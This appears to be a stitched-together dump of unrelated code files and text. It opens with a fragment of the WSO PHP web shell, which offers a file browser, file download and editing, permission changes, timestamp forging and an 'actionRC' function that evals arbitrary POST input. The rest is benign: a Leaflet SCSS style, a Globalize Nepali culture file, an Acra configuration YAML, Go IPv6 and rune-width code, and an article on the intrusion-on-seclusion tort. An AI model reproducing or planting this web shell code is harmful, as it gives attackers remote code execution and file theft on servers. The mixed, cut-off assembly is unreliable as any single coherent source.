1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "wsoCmp"); usort($dirs, "wsoCmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; $l = $l?0:1; } echo "<tr><td colspan=7>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; if(class_exists('ZipArchive')) echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>"; echo "<option value='tar'>Compress (tar.gz)</option>"; if(!empty($_COOKIE['act']) && @count($_COOKIE['f'])) echo "<option value='paste'>Paste / Compress</option>"; echo "</select> "; if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'> "; echo "<input type='submit' value='>>'></td></tr></form></table></div>"; wsoFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } wsoHeader(); echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; echo '<span>Change time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; echo '<br><br>'; switch($_POST['p2']) { case 'view': echo '<pre class=ml1>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</pre>'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; } clearstatcache(); echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],"w"); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!<br><script>p3_="";</script>'; @touch($_POST['p1'],$time,$time); } } echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</textarea><input type=submit value=">>"></form>'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000<br>','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} $h[1] .= '<br>'; $h[2] .= "\n"; } } echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br>'; else die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); } echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; break; } echo '</div>'; wsoFooter(); } function actionRC() { if(!@$_POST['p1']) { $a = array( "uname" => php_uname(), "php_version" => phpversion(), "wso_version" => WS_VER, "safemode" => @ini_get('safe_mode') ); echo serialize($a); } else { eval($_POST['p1']); } } if( empty($_POST['a']) ) if(isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action; else $_POST['a'] = 'SecInfo'; if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']); exit;
```
|
```scss
.leaflet-control-layers-control .layers-control-panel{
padding: 6px 10px 6px 6px;
background: #fff;
width: 300px;
min-height: 74px;
max-height: 418px;
overflow-y: auto;
.loading{
margin-top: 6px;
margin-left: 4px;
}
.close-button{
display: inline-block;
background-image: url(data:image/png;base64,your_sha256_hashUBAFJ9pMflNIP/iVSkIb2wgccXd7g7O+your_sha256_hashoJNX6IDZfbUBQNrX7qfeXfPuqwBAQjEz60w64htGJ+luFH48gt+NYe6v5b/cnr9asM+HlRQ2Qlwh2CjuqQQ9vKsKTwhQ1wAAAABJRU5ErkJggg==);
height: 18px;
width: 18px;
margin-right: 0;
float: right;
vertical-align: middle;
text-align: right;
margin-top: 0px;
margin-left: 16px;
position: relative;
left: 2px;
&:hover{
opacity: 0.7;
cursor: pointer;
}
}
.title{
font-size: 120%;
margin-right: 60px;
}
hr{
clear: both;
margin: 6px 0px;
border-color: #ddd;
}
*{
font-size: 12px;
}
.layer-group-title{
margin-top: 2px;
margin-bottom: 2px;
white-space: nowrap;
text-overflow: ellipsis;
overflow: hidden;
}
}
```
|
```javascript
/*
* Globalize Culture ne-NP
*
* path_to_url
*
* Dual licensed under the MIT or GPL Version 2 licenses.
* path_to_url
*
* This file was generated by the Globalize Culture Generator
* Translation: bugs found in this file need to be fixed in the generator
*/
(function( window, undefined ) {
var Globalize;
if ( typeof require !== "undefined" &&
typeof exports !== "undefined" &&
typeof module !== "undefined" ) {
// Assume CommonJS
Globalize = require( "globalize" );
} else {
// Global variable
Globalize = window.Globalize;
}
Globalize.addCultureInfo( "ne-NP", "default", {
name: "ne-NP",
englishName: "Nepali (Nepal)",
nativeName: " ()",
language: "ne",
numberFormat: {
groupSizes: [3,2],
"NaN": "nan",
negativeInfinity: "-infinity",
positiveInfinity: "infinity",
percent: {
pattern: ["-n%","n%"],
groupSizes: [3,2]
},
currency: {
pattern: ["-$n","$n"],
symbol: ""
}
},
calendars: {
standard: {
days: {
names: ["","","","","","",""],
namesAbbr: ["","","","","","",""],
namesShort: ["","","","","","",""]
},
months: {
names: ["","","","","","","","","","","","",""],
namesAbbr: ["","","","","","","","","","","","",""]
},
AM: ["","",""],
PM: ["","",""],
eras: [{"name":"a.d.","start":null,"offset":0}],
patterns: {
Y: "MMMM,yyyy"
}
}
}
});
}( this ));
```
|
```yaml
version: 0.95.0
# path to config
config_file:
# Connection string for DB PostgreSQL(postgresql://{user}:{password}@{host}:{port}/{dbname}?sslmode={sslmode}), MySQL ({user}:{password}@tcp({host}:{port})/{dbname})
db_connection_string:
# perform rotation without saving rotated AcraStructs and keys
dry-run: false
# dump config
dump_config: false
# Path to file with map of <ClientId>: <FilePaths> in json format {"client_id1": ["filepath1", "filepath2"], "client_id2": ["filepath1", "filepath2"]}
file_map_config:
# Generate with yaml config markdown text file with descriptions of all args
generate_markdown_args_table: false
# Folder from which the keys will be loaded
keys_dir: .acrakeys
# Keystore encryptor strategy: <env_master_key|kms_encrypted_master_key|vault_master_key|kms_per_client
keystore_encryption_type: env_master_key
# KMS credentials JSON file path
kms_credentials_path:
# KMS type for using: <aws>
kms_type:
# Handle MySQL connections
mysql_enable: false
# Handle Postgresql connections
postgresql_enable: false
# Number of Redis database for keys
redis_db_keys: 0
# <host>:<port> used to connect to Redis
redis_host_port:
# Password to Redis database
redis_password:
# Set authentication mode that will be used in TLS connection. Values in range 0-4 that set auth type (path_to_url#ClientAuthType). Default is -1 which means NotSpecified and will be used value from tls_auth.
redis_tls_client_auth: -1
# Path to root certificate which will be used with system root certificates to validate peer's certificate. Uses --tls_ca value if not specified.
redis_tls_client_ca:
# Path to certificate. Uses --tls_cert value if not specified.
redis_tls_client_cert:
# Path to private key that will be used for TLS connections. Uses --tls_key value if not specified.
redis_tls_client_key:
# Expected Server Name (SNI) from the service's side.
redis_tls_client_sni:
# How many CRLs to cache in memory (use 0 to disable caching)
redis_tls_crl_client_cache_size: 16
# How long to keep CRLs cached, in seconds (use 0 to disable caching, maximum: 300 s)
redis_tls_crl_client_cache_time: 0
# Put 'true' to check only final/last certificate, or 'false' to check the whole certificate chain using CRL
redis_tls_crl_client_check_only_leaf_certificate: false
# How to treat CRL URL described in certificate itself: <use|trust|prefer|ignore>
redis_tls_crl_client_from_cert: prefer
# URL of the Certificate Revocation List (CRL) to use
redis_tls_crl_client_url:
# Use TLS to connect to Redis
redis_tls_enable: false
# Put 'true' to check only final/last certificate, or 'false' to check the whole certificate chain using OCSP
redis_tls_ocsp_client_check_only_leaf_certificate: false
# How to treat OCSP server described in certificate itself: <use|trust|prefer|ignore>
redis_tls_ocsp_client_from_cert: prefer
# How to treat certificates unknown to OCSP: <denyUnknown|allowUnknown|requireGood>
redis_tls_ocsp_client_required: denyUnknown
# OCSP service URL
redis_tls_ocsp_client_url:
# Select query with ? as placeholders where last columns in result must be ClientId and AcraStruct. Other columns will be passed into insert/update query into placeholders
sql_select:
# Insert/Update query with ? as placeholder where into first will be placed rotated AcraStruct
sql_update:
# Set authentication mode that will be used in TLS connection. Values in range 0-4 that set auth type (path_to_url#ClientAuthType). Default is tls.RequireAndVerifyClientCert
tls_auth: 4
# Path to root certificate which will be used with system root certificates to validate peer's certificate
tls_ca:
# Path to certificate
tls_cert:
# How many CRLs to cache in memory (use 0 to disable caching)
tls_crl_cache_size: 16
# How long to keep CRLs cached, in seconds (use 0 to disable caching, maximum: 300 s)
tls_crl_cache_time: 0
# Put 'true' to check only final/last certificate, or 'false' to check the whole certificate chain using CRL
tls_crl_check_only_leaf_certificate: false
# How many CRLs to cache in memory (use 0 to disable caching)
tls_crl_database_cache_size: 16
# How long to keep CRLs cached, in seconds (use 0 to disable caching, maximum: 300 s)
tls_crl_database_cache_time: 0
# Put 'true' to check only final/last certificate, or 'false' to check the whole certificate chain using CRL
tls_crl_database_check_only_leaf_certificate: false
# How to treat CRL URL described in certificate itself: <use|trust|prefer|ignore>
tls_crl_database_from_cert: prefer
# URL of the Certificate Revocation List (CRL) to use
tls_crl_database_url:
# How to treat CRL URL described in certificate itself: <use|trust|prefer|ignore>
tls_crl_from_cert: prefer
# URL of the Certificate Revocation List (CRL) to use
tls_crl_url:
# Set authentication mode that will be used in TLS connection. Values in range 0-4 that set auth type (path_to_url#ClientAuthType). Default is -1 which means NotSpecified and will be used value from tls_auth.
tls_database_auth: -1
# Path to root certificate which will be used with system root certificates to validate peer's certificate. Uses --tls_ca value if not specified.
tls_database_ca:
# Path to certificate. Uses --tls_cert value if not specified.
tls_database_cert:
# Enable TLS for DB
tls_database_enabled: false
# Path to private key that will be used for TLS connections. Uses --tls_key value if not specified.
tls_database_key:
# Expected Server Name (SNI) from the service's side.
tls_database_sni:
# Path to private key that will be used for TLS connections
tls_key:
# Put 'true' to check only final/last certificate, or 'false' to check the whole certificate chain using OCSP
tls_ocsp_check_only_leaf_certificate: false
# Put 'true' to check only final/last certificate, or 'false' to check the whole certificate chain using OCSP
tls_ocsp_database_check_only_leaf_certificate: false
# How to treat OCSP server described in certificate itself: <use|trust|prefer|ignore>
tls_ocsp_database_from_cert: prefer
# How to treat certificates unknown to OCSP: <denyUnknown|allowUnknown|requireGood>
tls_ocsp_database_required: denyUnknown
# OCSP service URL
tls_ocsp_database_url:
# How to treat OCSP server described in certificate itself: <use|trust|prefer|ignore>
tls_ocsp_from_cert: prefer
# How to treat certificates unknown to OCSP: <denyUnknown|allowUnknown|requireGood>
tls_ocsp_required: denyUnknown
# OCSP service URL
tls_ocsp_url:
# Connection string (path_to_url for loading ACRA_MASTER_KEY from HashiCorp Vault
vault_connection_api_string:
# KV Secret Path (secret/) for reading ACRA_MASTER_KEY from HashiCorp Vault
vault_secrets_path: secret/
# Path to CA certificate for HashiCorp Vault certificate validation (deprecated since 0.94.0, use `vault_tls_client_ca`)
vault_tls_ca_path:
# Set authentication mode that will be used in TLS connection. Values in range 0-4 that set auth type (path_to_url#ClientAuthType). Default is -1 which means NotSpecified and will be used value from tls_auth.
vault_tls_client_auth: -1
# Path to root certificate which will be used with system root certificates to validate peer's certificate. Uses --tls_ca value if not specified.
vault_tls_client_ca:
# Path to certificate. Uses --tls_cert value if not specified.
vault_tls_client_cert:
# Path to private key that will be used for TLS connections. Uses --tls_key value if not specified.
vault_tls_client_key:
# Expected Server Name (SNI) from the service's side.
vault_tls_client_sni:
# How many CRLs to cache in memory (use 0 to disable caching)
vault_tls_crl_client_cache_size: 16
# How long to keep CRLs cached, in seconds (use 0 to disable caching, maximum: 300 s)
vault_tls_crl_client_cache_time: 0
# Put 'true' to check only final/last certificate, or 'false' to check the whole certificate chain using CRL
vault_tls_crl_client_check_only_leaf_certificate: false
# How to treat CRL URL described in certificate itself: <use|trust|prefer|ignore>
vault_tls_crl_client_from_cert: prefer
# URL of the Certificate Revocation List (CRL) to use
vault_tls_crl_client_url:
# Put 'true' to check only final/last certificate, or 'false' to check the whole certificate chain using OCSP
vault_tls_ocsp_client_check_only_leaf_certificate: false
# How to treat OCSP server described in certificate itself: <use|trust|prefer|ignore>
vault_tls_ocsp_client_from_cert: prefer
# How to treat certificates unknown to OCSP: <denyUnknown|allowUnknown|requireGood>
vault_tls_ocsp_client_required: denyUnknown
# OCSP service URL
vault_tls_ocsp_client_url:
# Use TLS to encrypt transport with HashiCorp Vault
vault_tls_transport_enable: false
```
|
```go
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build ignore
// +godefs map struct_in6_addr [16]byte /* in6_addr */
package ipv6
/*
#define __APPLE_USE_RFC_3542
#include <netinet/in.h>
#include <netinet/icmp6.h>
*/
import "C"
const (
sysIPV6_UNICAST_HOPS = C.IPV6_UNICAST_HOPS
sysIPV6_MULTICAST_IF = C.IPV6_MULTICAST_IF
sysIPV6_MULTICAST_HOPS = C.IPV6_MULTICAST_HOPS
sysIPV6_MULTICAST_LOOP = C.IPV6_MULTICAST_LOOP
sysIPV6_JOIN_GROUP = C.IPV6_JOIN_GROUP
sysIPV6_LEAVE_GROUP = C.IPV6_LEAVE_GROUP
sysIPV6_PORTRANGE = C.IPV6_PORTRANGE
sysICMP6_FILTER = C.ICMP6_FILTER
sysIPV6_2292PKTINFO = C.IPV6_2292PKTINFO
sysIPV6_2292HOPLIMIT = C.IPV6_2292HOPLIMIT
sysIPV6_2292NEXTHOP = C.IPV6_2292NEXTHOP
sysIPV6_2292HOPOPTS = C.IPV6_2292HOPOPTS
sysIPV6_2292DSTOPTS = C.IPV6_2292DSTOPTS
sysIPV6_2292RTHDR = C.IPV6_2292RTHDR
sysIPV6_2292PKTOPTIONS = C.IPV6_2292PKTOPTIONS
sysIPV6_CHECKSUM = C.IPV6_CHECKSUM
sysIPV6_V6ONLY = C.IPV6_V6ONLY
sysIPV6_IPSEC_POLICY = C.IPV6_IPSEC_POLICY
sysIPV6_RECVTCLASS = C.IPV6_RECVTCLASS
sysIPV6_TCLASS = C.IPV6_TCLASS
sysIPV6_RTHDRDSTOPTS = C.IPV6_RTHDRDSTOPTS
sysIPV6_RECVPKTINFO = C.IPV6_RECVPKTINFO
sysIPV6_RECVHOPLIMIT = C.IPV6_RECVHOPLIMIT
sysIPV6_RECVRTHDR = C.IPV6_RECVRTHDR
sysIPV6_RECVHOPOPTS = C.IPV6_RECVHOPOPTS
sysIPV6_RECVDSTOPTS = C.IPV6_RECVDSTOPTS
sysIPV6_USE_MIN_MTU = C.IPV6_USE_MIN_MTU
sysIPV6_RECVPATHMTU = C.IPV6_RECVPATHMTU
sysIPV6_PATHMTU = C.IPV6_PATHMTU
sysIPV6_PKTINFO = C.IPV6_PKTINFO
sysIPV6_HOPLIMIT = C.IPV6_HOPLIMIT
sysIPV6_NEXTHOP = C.IPV6_NEXTHOP
sysIPV6_HOPOPTS = C.IPV6_HOPOPTS
sysIPV6_DSTOPTS = C.IPV6_DSTOPTS
sysIPV6_RTHDR = C.IPV6_RTHDR
sysIPV6_AUTOFLOWLABEL = C.IPV6_AUTOFLOWLABEL
sysIPV6_DONTFRAG = C.IPV6_DONTFRAG
sysIPV6_PREFER_TEMPADDR = C.IPV6_PREFER_TEMPADDR
sysIPV6_MSFILTER = C.IPV6_MSFILTER
sysMCAST_JOIN_GROUP = C.MCAST_JOIN_GROUP
sysMCAST_LEAVE_GROUP = C.MCAST_LEAVE_GROUP
sysMCAST_JOIN_SOURCE_GROUP = C.MCAST_JOIN_SOURCE_GROUP
sysMCAST_LEAVE_SOURCE_GROUP = C.MCAST_LEAVE_SOURCE_GROUP
sysMCAST_BLOCK_SOURCE = C.MCAST_BLOCK_SOURCE
sysMCAST_UNBLOCK_SOURCE = C.MCAST_UNBLOCK_SOURCE
sysIPV6_BOUND_IF = C.IPV6_BOUND_IF
sysIPV6_PORTRANGE_DEFAULT = C.IPV6_PORTRANGE_DEFAULT
sysIPV6_PORTRANGE_HIGH = C.IPV6_PORTRANGE_HIGH
sysIPV6_PORTRANGE_LOW = C.IPV6_PORTRANGE_LOW
sysSizeofSockaddrStorage = C.sizeof_struct_sockaddr_storage
sysSizeofSockaddrInet6 = C.sizeof_struct_sockaddr_in6
sysSizeofInet6Pktinfo = C.sizeof_struct_in6_pktinfo
sysSizeofIPv6Mtuinfo = C.sizeof_struct_ip6_mtuinfo
sysSizeofIPv6Mreq = C.sizeof_struct_ipv6_mreq
sysSizeofGroupReq = C.sizeof_struct_group_req
sysSizeofGroupSourceReq = C.sizeof_struct_group_source_req
sysSizeofICMPv6Filter = C.sizeof_struct_icmp6_filter
)
type sysSockaddrStorage C.struct_sockaddr_storage
type sysSockaddrInet6 C.struct_sockaddr_in6
type sysInet6Pktinfo C.struct_in6_pktinfo
type sysIPv6Mtuinfo C.struct_ip6_mtuinfo
type sysIPv6Mreq C.struct_ipv6_mreq
type sysICMPv6Filter C.struct_icmp6_filter
type sysGroupReq C.struct_group_req
type sysGroupSourceReq C.struct_group_source_req
```
|
Intrusion on seclusion is one of the four privacy torts created under U.S. common law. Intrusion on seclusion is commonly thought to be the bread-and-butter claim for an "invasion of privacy." Seclusion is defined as the state of being private and away from people.
Elements
The elements of an intrusion on seclusion claim are:
The defendant intentionally intruded upon the plaintiff's seclusion or private concerns.
The intrusion would be highly offensive to a reasonable person.
The intrusion caused the plaintiff anguish and suffering.
There is no requirement that the defendant disclosed any facts about the plaintiff, as in a public disclosure claim. Liability attaches to the intrusion itself.
Intent
Someone "commits an intentional intrusion only if he believes, or is substantially certain, that he lacks the necessary legal or personal permission to commit the intrusive act."
For example, the Veterans Administration did not intrude on a patient's seclusion when it believed that it had the patient's consent to disclose his medical records.
The intent element is subjective, based on what the defendant actually knew or believed about whether it had consent or legal permission, whereas the offensiveness element is judged under an objective standard, based on whether a reasonable person would consider the intrusion to be highly offensive.
Seclusion
In order to intrude on someone's seclusion, the person must have a "legitimate expectation of privacy" in the physical place or personal affairs intruded upon.
To be successful, a plaintiff "must show the defendant penetrated some zone of physical or sensory privacy" or "obtained unwanted access to data" in which the plaintiff had "an objectively reasonable expectation of seclusion or solitude in the place, conversation or data source."
For example, a delicatessen employee told co-workers that she had a staph infection. The co-workers then informed their manager, who contacted the employee's doctor to determine if she actually had a staph infection, because employees in Arkansas with a communicable disease are forbidden from working in the food preparation industry.
The employee with the staph infection sued her employer, the deli, for intruding on her private affairs. The court held that the deli manager had not intruded upon the worker's private affairs because the worker had made her staph infection public by telling her two co-workers about it.
The court said:
Offensiveness
In determining whether an intrusion is objectively "highly offensive," a court is supposed to examine "all the circumstances of an intrusion, including the motives or justification of the intruder."
Websites' data collection
A website may commit a "highly offensive" act by collecting information from website visitors using "duplicitous tactics." A website that violates its own privacy policy does not automatically commit a highly offensive act. But the Third Circuit Court of Appeals has held that Viacom's data collection on the Nickelodeon website was highly offensive because the privacy policy may have deceptively caused parents to allow their young children to use Nick.com, thinking it was not collecting their personal information.
The press
The First Amendment "does not immunize the press from torts or crimes committed in an effort to gather news." But the press is given more latitude to intrude on seclusion to gather important information, so many actions that would be considered "highly offensive" if performed by a private citizen may not be considered offensive if performed by a journalist in the "pursuit of a socially or politically important story."
See also
Cohen v. Cowles Media Co. (1991)
False light
Personality rights
References
Law of the United States
Tort law
Common law
|
```yaml
base_image: {{ env["RAY_IMAGE_NIGHTLY_CPU"] }}
env_vars: {}
debian_packages: []
python:
pip_packages: [rich]
conda_packages: []
post_build_cmds:
- pip uninstall -y ray || true && pip3 install -U {{ env["RAY_WHEELS"] | default("ray") }}
- {{ env["RAY_WHEELS_SANITY_CHECK"] | default("echo No Ray wheels sanity check") }}
```
|
```go
package runewidth
var (
// EastAsianWidth will be set true if the current locale is CJK
EastAsianWidth = IsEastAsian()
// DefaultCondition is a condition in current locale
DefaultCondition = &Condition{EastAsianWidth}
)
type interval struct {
first rune
last rune
}
type table []interval
func inTables(r rune, ts ...table) bool {
for _, t := range ts {
if inTable(r, t) {
return true
}
}
return false
}
func inTable(r rune, t table) bool {
// func (t table) IncludesRune(r rune) bool {
if r < t[0].first {
return false
}
bot := 0
top := len(t) - 1
for top >= bot {
mid := (bot + top) / 2
switch {
case t[mid].last < r:
bot = mid + 1
case t[mid].first > r:
top = mid - 1
default:
return true
}
}
return false
}
var private = table{
{0x00E000, 0x00F8FF}, {0x0F0000, 0x0FFFFD}, {0x100000, 0x10FFFD},
}
var nonprint = table{
{0x0000, 0x001F}, {0x007F, 0x009F}, {0x00AD, 0x00AD},
{0x070F, 0x070F}, {0x180B, 0x180E}, {0x200B, 0x200F},
{0x202A, 0x202E}, {0x206A, 0x206F}, {0xD800, 0xDFFF},
{0xFEFF, 0xFEFF}, {0xFFF9, 0xFFFB}, {0xFFFE, 0xFFFF},
}
var combining = table{
{0x0300, 0x036F}, {0x0483, 0x0489}, {0x0591, 0x05BD},
{0x05BF, 0x05BF}, {0x05C1, 0x05C2}, {0x05C4, 0x05C5},
{0x05C7, 0x05C7}, {0x0610, 0x061A}, {0x064B, 0x065F},
{0x0670, 0x0670}, {0x06D6, 0x06DC}, {0x06DF, 0x06E4},
{0x06E7, 0x06E8}, {0x06EA, 0x06ED}, {0x0711, 0x0711},
{0x0730, 0x074A}, {0x07A6, 0x07B0}, {0x07EB, 0x07F3},
{0x0816, 0x0819}, {0x081B, 0x0823}, {0x0825, 0x0827},
{0x0829, 0x082D}, {0x0859, 0x085B}, {0x08D4, 0x08E1},
{0x08E3, 0x0903}, {0x093A, 0x093C}, {0x093E, 0x094F},
{0x0951, 0x0957}, {0x0962, 0x0963}, {0x0981, 0x0983},
{0x09BC, 0x09BC}, {0x09BE, 0x09C4}, {0x09C7, 0x09C8},
{0x09CB, 0x09CD}, {0x09D7, 0x09D7}, {0x09E2, 0x09E3},
{0x0A01, 0x0A03}, {0x0A3C, 0x0A3C}, {0x0A3E, 0x0A42},
{0x0A47, 0x0A48}, {0x0A4B, 0x0A4D}, {0x0A51, 0x0A51},
{0x0A70, 0x0A71}, {0x0A75, 0x0A75}, {0x0A81, 0x0A83},
{0x0ABC, 0x0ABC}, {0x0ABE, 0x0AC5}, {0x0AC7, 0x0AC9},
{0x0ACB, 0x0ACD}, {0x0AE2, 0x0AE3}, {0x0B01, 0x0B03},
{0x0B3C, 0x0B3C}, {0x0B3E, 0x0B44}, {0x0B47, 0x0B48},
{0x0B4B, 0x0B4D}, {0x0B56, 0x0B57}, {0x0B62, 0x0B63},
{0x0B82, 0x0B82}, {0x0BBE, 0x0BC2}, {0x0BC6, 0x0BC8},
{0x0BCA, 0x0BCD}, {0x0BD7, 0x0BD7}, {0x0C00, 0x0C03},
{0x0C3E, 0x0C44}, {0x0C46, 0x0C48}, {0x0C4A, 0x0C4D},
{0x0C55, 0x0C56}, {0x0C62, 0x0C63}, {0x0C81, 0x0C83},
{0x0CBC, 0x0CBC}, {0x0CBE, 0x0CC4}, {0x0CC6, 0x0CC8},
{0x0CCA, 0x0CCD}, {0x0CD5, 0x0CD6}, {0x0CE2, 0x0CE3},
{0x0D01, 0x0D03}, {0x0D3E, 0x0D44}, {0x0D46, 0x0D48},
{0x0D4A, 0x0D4D}, {0x0D57, 0x0D57}, {0x0D62, 0x0D63},
{0x0D82, 0x0D83}, {0x0DCA, 0x0DCA}, {0x0DCF, 0x0DD4},
{0x0DD6, 0x0DD6}, {0x0DD8, 0x0DDF}, {0x0DF2, 0x0DF3},
{0x0E31, 0x0E31}, {0x0E34, 0x0E3A}, {0x0E47, 0x0E4E},
{0x0EB1, 0x0EB1}, {0x0EB4, 0x0EB9}, {0x0EBB, 0x0EBC},
{0x0EC8, 0x0ECD}, {0x0F18, 0x0F19}, {0x0F35, 0x0F35},
{0x0F37, 0x0F37}, {0x0F39, 0x0F39}, {0x0F3E, 0x0F3F},
{0x0F71, 0x0F84}, {0x0F86, 0x0F87}, {0x0F8D, 0x0F97},
{0x0F99, 0x0FBC}, {0x0FC6, 0x0FC6}, {0x102B, 0x103E},
{0x1056, 0x1059}, {0x105E, 0x1060}, {0x1062, 0x1064},
{0x1067, 0x106D}, {0x1071, 0x1074}, {0x1082, 0x108D},
{0x108F, 0x108F}, {0x109A, 0x109D}, {0x135D, 0x135F},
{0x1712, 0x1714}, {0x1732, 0x1734}, {0x1752, 0x1753},
{0x1772, 0x1773}, {0x17B4, 0x17D3}, {0x17DD, 0x17DD},
